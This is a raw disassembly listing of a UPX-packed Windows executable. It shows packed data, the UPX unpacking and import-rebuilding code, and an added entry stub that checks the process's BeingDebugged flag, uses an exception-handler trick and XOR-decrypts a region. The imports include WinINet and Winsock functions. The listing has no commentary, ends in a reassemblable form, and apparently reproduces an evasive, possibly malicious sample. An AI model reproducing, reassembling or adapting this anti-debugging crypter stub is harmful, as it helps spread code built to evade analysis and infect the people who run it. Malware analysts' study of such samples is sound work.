dd 0FC2FB2F5h, 885D5F8Fh, 0C91CEB8Ah, 3CE89F11h, 6048102Bh
dd 45CF92D1h, 0A3F40CF6h, 60CA060h, 0A0BC8790h, 0CB10Ch
dd 47277FDFh, 40880CA0h, 0EC000900h, 60000703h, 9524F08Fh
dd 7C4F4014h, 91BF4070h, 0D914BDh, 3C134307h, 781FF84Fh
dd 0AB001385h, 13E9A65Bh, 1A2FF810h, 0FF8139E3h, 40230EFEh
dd 0A106183Ah, 88840836h, 4FBA7C9Eh, 0EE10B943h, 10B801FFh
dd 0CC3E200Ch, 0DAD4F26h
dd 0D80F7F07h, 42BCB3E4h, 84700118h, 21F2000Fh, 950F84AFh
dd 0C9B0000Fh, 7F02DF93h, 0F6C0F84h, 955BD900h, 6FA89AF0h
dd 27F91343h, 691F1181h, 2050586Eh, 0DB677250h, 46005814h
dd 32390144h, 9089F927h, 15123C6Bh, 53410275h, 9081AF64h
dd 1941C00h, 4395FFF3h, 5CC606EBh, 5C73255Ch, 24637069h
dd 7FFF2EA6h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 46EAD176h, 0A767A31Fh, 756A6441h, 0B96F5461h, 10DB266Dh
dd 4C73176Eh, 7075126Fh, 27F76FD4h, 756C6156h, 4F174165h
dd 636F2870h, 0CC6A4752h, 430034B2h, 1B3F6176h, 33C18A95h
dd 6D4C79E3h, 2B54BFF9h, 6C6CD86Bh, 6172545Fh, 646E5779h
dd 0AA5B6A5Bh, 1A613143h, 56F6852h, 773AA546h, 140C6854h
dd 66DB7356h, 58B6D6EAh, 454F2841h, 0E83A7778h, 6EDACF4Bh
dd 0F3F54735h, 5454481Eh, 2E25FB50h, 203C7FD1h, 4F205732h
dd 10A0D4Bh, 0DF57376Dh, 2616F4Bh, 67044C2Dh, 5BECD94Bh
dd 25203AD5h, 282F1875h, 0F6B5B56h, 26B57954h, 51DE70A3h
dd 63D4CDABh, 22F1583h, 0D53ABD5Ah, 7C932DC7h, 2D0A8DF7h
dd 4757C6h, 0E95FF42Bh, 64F66D1Eh, 8D73CBE5h, 0B2D4E6Dh
dd 637673EDh, 6977CBA9h, 0DF7366F1h, 5F32032Dh, 3E77517h
dd 7B9D3435h, 6933349Bh, 320307B7h, 0DD9DCF31h, 273930D2h
dd 7E10038h, 90641906h, 31323334h, 41907521h, 0CF783630h
dd 352B59FFh, 97B5A83Ah, 54464F53h, 8B524157h, 45F2AB6Dh
dd 0DD694D5Ch, 9B5CB36Fh, 7EE8057h, 7275435Ch, 0DE56F172h
dd 0E2C3B4E6h, 75525C70h, 0D855B8A0h, 30EFEDBDh, 6E670F83h
dd 6A726473h, 0D6652379h, 9372BD84h, 0DA495300h, 18285757h
dd 216C0EB6h, 0D573A73h, 0D72B7370h, 20534449h, 6D672243h
dd 20DC1AE5h, 76FFED76h, 0C9324448h, 9DECF736h, 10532063h
dd 0B91B6544h, 1A7B2165h, 0D8172387h, 129BF1F8h, 34737983h
dd 20274200h, 0D1AD62DCh, 13232583h, 6206D1Bh, 3C6B50ACh
dd 44377606h, 1636DC0h, 66D220A4h, 0BF6D672Fh, 747B2DD0h
dd 0A6324EBh, 20797469h, 0C44ECA4Dh, 1E6E61DAh, 100C61Ah
dd 118A8490h, 0C455D127h, 447B014Bh, 467C9FB2h, 0C656572h
dd 0DC460D89h, 65477E00h, 176F4D74h, 3FB4665h, 4EF11BF8h
dd 1F86D61h, 7274736Ch, 702D2563h, 430A5DEFh, 1979706Fh
dd 8F886D0Ah, 7845EE11h, 54DE3265h, 496C6F6Fh, 0F7DFFED1h
dd 53323370h, 7370616Eh, 19746F68h, 0BBA2952Ch, 723212B5h
dd 1F540F73h, 0AE60B01Fh, 21182C35h, 7478654Eh, 60B6C3C1h
dd 54416169h, 0B6DE7645h, 6BDB6BFFh, 46746961h, 3C53726Fh
dd 624F7B67h, 442B586Ah, 442C76D7h, 808D229Dh, 727B3737h
dd 0C83A0B69h, 0BD486573h, 0A195EF64h, 5E24470Ch, 0B61DEE10h
dd 61D26E08h, 6D9DF05Ah, 44638DAEh, 796456A3h, 4AEB4C14h
dd 6198B6C0h, 0FB1492Bh, 988C0953h, 7065764Dh, 6F216E9Eh
dd 0D92E7FB1h, 410B12CBh, 0F726464h, 10DF7BD9h, 62694CC2h
dd 0A0526172h, 0B9A2B2F7h, 676D4D36h, 0CD9F5013h, 0BA79C202h
dd 63695463h, 85B58715h, 6575736Bh, 2B364DC9h, 7864B092h
dd 220D4D1Fh, 5D6C37B4h, 613A39AFh, 62CC21E5h, 31784545h
dd 0C4706EDBh, 6BF13349h, 630A6465h, 6E09B913h, 522D6D6Ch
dd 0E7B441Bh, 8E1766Ch, 38657A71h, 5A364CA7h, 459002DBh
dd 0D14BC3FCh, 33759F9h, 0A1673A76h, 4579654Bh, 0DCE40EC3h
dd 0F3C8610h, 0B5AC25ECh, 11F60A51h, 0C598309Eh, 21D20426h
dd 0B7684110h, 0C51CB77h, 0A96E6241h, 0C288D847h, 0E8046853h
dd 7079066Eh, 0B30A3582h, 74367774h, 6CC57710h, 12440AFBh
dd 69110E61h, 0AC367966h, 67CA6C75h, 362B757Ah, 0DEC2DE6Ch
dd 796FCE86h, 0A06F112Ch, 10CEE042h, 21898F52h, 4B71EC7Fh
dd 6341149Fh, 72697571h, 0B0E95CE0h, 0A020494Dh, 4F866D3Ah
dd 0E8DE13B3h, 6CA7273h, 9C31626Dh, 0E35B2A3h, 0B42B0F7Dh
dd 4D53D733h, 58445F1Dh, 0E8158B3Fh, 0F6685F70h, 6C022774h
dd 798C2B6h, 0E94FAE63h, 2911010Ch, 2291C15Ah, 680198E4h
dd 65121D9Ah, 84C21589h, 0A146C59h, 2B76B4E7h, 66490DDCh
dd 5707377h, 4F4166B1h, 0CD38C502h, 0D50420F4h, 87B6C2D8h
dd 419B5585h, 586E0E11h, 14520A42h, 4C370C6Bh, 346E030Dh
dd 81745343h, 0CB1928BDh, 9688471Ah, 0E651DB65h, 20273FFh
dd 9659010Dh, 6F395965h, 650C1734h, 9659659h, 16101304h
dd 519E8955h, 894550B1h, 6F907FB6h, 0D3E41711h, 0F00E040h
dd 6010B01h, 1CB2240Ch, 57126801h, 7A1022ECh, 51082B95h
dd 366E922Eh, 0C07C584h, 0CEC0D960h, 10341EDCh, 0C4210607h
dd 0D4032C72h, 5C548C2Ch, 6400BB61h, 2E1E0178h, 7BB60D46h
dd 23DC0755h, 7B922490h, 0BD4219BCh, 642EE010h, 0D85BFBE1h
dd 7446437h, 162728h, 0C0B972F8h, 2ED85000h, 54AEh, 0
dd 24000000h, 0FFh, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_30906000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_30907B72
; ---------------------------------------------------------------------------
align 8
loc_30907B68: ; CODE XREF: UPX1:loc_30907B79�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_30907B6E: ; CODE XREF: UPX1:30907C06�j
; UPX1:30907C1D�j
add ebx, ebx
jnz short loc_30907B79
loc_30907B72: ; CODE XREF: UPX1:30907B60�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30907B79: ; CODE XREF: UPX1:30907B70�j
jb short loc_30907B68
mov eax, 1
loc_30907B80: ; CODE XREF: UPX1:30907B8F�j
; UPX1:30907B9A�j
add ebx, ebx
jnz short loc_30907B8B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30907B8B: ; CODE XREF: UPX1:30907B82�j
adc eax, eax
add ebx, ebx
jnb short loc_30907B80
jnz short loc_30907B9C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30907B80
loc_30907B9C: ; CODE XREF: UPX1:30907B91�j
xor ecx, ecx
sub eax, 3
jb short loc_30907BB0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_30907C22
mov ebp, eax
loc_30907BB0: ; CODE XREF: UPX1:30907BA1�j
add ebx, ebx
jnz short loc_30907BBB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30907BBB: ; CODE XREF: UPX1:30907BB2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_30907BC8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30907BC8: ; CODE XREF: UPX1:30907BBF�j
adc ecx, ecx
jnz short loc_30907BEC
inc ecx
loc_30907BCD: ; CODE XREF: UPX1:30907BDC�j
; UPX1:30907BE7�j
add ebx, ebx
jnz short loc_30907BD8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30907BD8: ; CODE XREF: UPX1:30907BCF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_30907BCD
jnz short loc_30907BE9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30907BCD
loc_30907BE9: ; CODE XREF: UPX1:30907BDE�j
add ecx, 2
loc_30907BEC: ; CODE XREF: UPX1:30907BCA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_30907C0C
loc_30907BFD: ; CODE XREF: UPX1:30907C04�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_30907BFD
jmp loc_30907B6E
; ---------------------------------------------------------------------------
align 4
loc_30907C0C: ; CODE XREF: UPX1:30907BFB�j
; UPX1:30907C19�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_30907C0C
add edi, ecx
jmp loc_30907B6E
; ---------------------------------------------------------------------------
loc_30907C22: ; CODE XREF: UPX1:30907BAC�j
pop esi
mov edi, esi
mov ecx, 8Ah
loc_30907C2A: ; CODE XREF: UPX1:30907C31�j
; UPX1:30907C36�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_30907C2F: ; CODE XREF: UPX1:30907C54�j
cmp al, 1
ja short loc_30907C2A
cmp byte ptr [edi], 1
jnz short loc_30907C2A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_30907C2F
lea edi, [esi+5000h]
loc_30907C5C: ; CODE XREF: UPX1:30907C7E�j
mov eax, [edi]
or eax, eax
jz short loc_30907CA7
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_30907C79: ; CODE XREF: UPX1:30907C9F�j
mov al, [edi]
inc edi
or al, al
jz short loc_30907C5C
mov ecx, edi
jns short near ptr loc_30907C8A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_30907C8A: ; CODE XREF: UPX1:30907C82�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_30907CA1
mov [ebx], eax
add ebx, 4
jmp short loc_30907C79
; ---------------------------------------------------------------------------
loc_30907CA1: ; CODE XREF: UPX1:30907C98�j
call dword ptr [esi+7094h]
loc_30907CA7: ; CODE XREF: UPX1:30907C60�j
popa
jmp loc_309022EC
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 30908000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3090825F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3090820F�j
jmp short near ptr loc_3090820A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3090825E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3090824D: ; CODE XREF: UPX2:3090825C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3090824D
locret_3090825E: ; CODE XREF: UPX2:30908220�j
retn
; ---------------------------------------------------------------------------
loc_3090825F: ; CODE XREF: UPX2:30908201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax+7Bh], dl
; ---------------------------------------------------------------------------
dd 0
db 90h
db 30h, 0, 1Eh
dd 200000h, 760h dup(0)
UPX2 ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3090A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start